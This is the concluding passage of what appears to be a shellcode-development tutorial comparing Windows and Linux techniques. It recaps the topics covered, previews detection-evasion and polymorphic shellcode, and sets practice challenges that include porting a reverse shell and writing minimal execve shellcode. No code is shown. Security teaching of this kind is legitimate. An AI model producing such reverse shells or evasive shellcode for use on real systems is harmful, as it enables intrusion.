Congratulations! You now understand the fundamental differences between Windows and Linux shellcode development. You've learned:

  • ✅ Windows PEB walking and API resolution techniques
  • ✅ Linux direct system call methodology
  • ✅ Platform-specific function calling conventions
  • ✅ Complete working examples for both platforms
  • ✅ Professional testing and debugging frameworks
  • ✅ Advanced 64-bit and architecture considerations
Ready for the Final Challenge? In the next article, we'll explore advanced techniques including encoding methods to evade detection, polymorphic shellcode generation, and the cat-and-mouse game between attackers and defenders.

Practice Challenges

  1. Cross-Platform Port: Take the Linux reverse shell and create a Windows equivalent
  2. Size Optimization: Create the smallest possible execve shellcode for Linux
  3. API Explorer: Write Windows shellcode that enumerates all functions in kernel32.dll
  4. System Call Tracer: Create Linux shellcode that traces its own system calls

Remember: These techniques are powerful tools for security research and defense. Always use them ethically and only in authorized environments.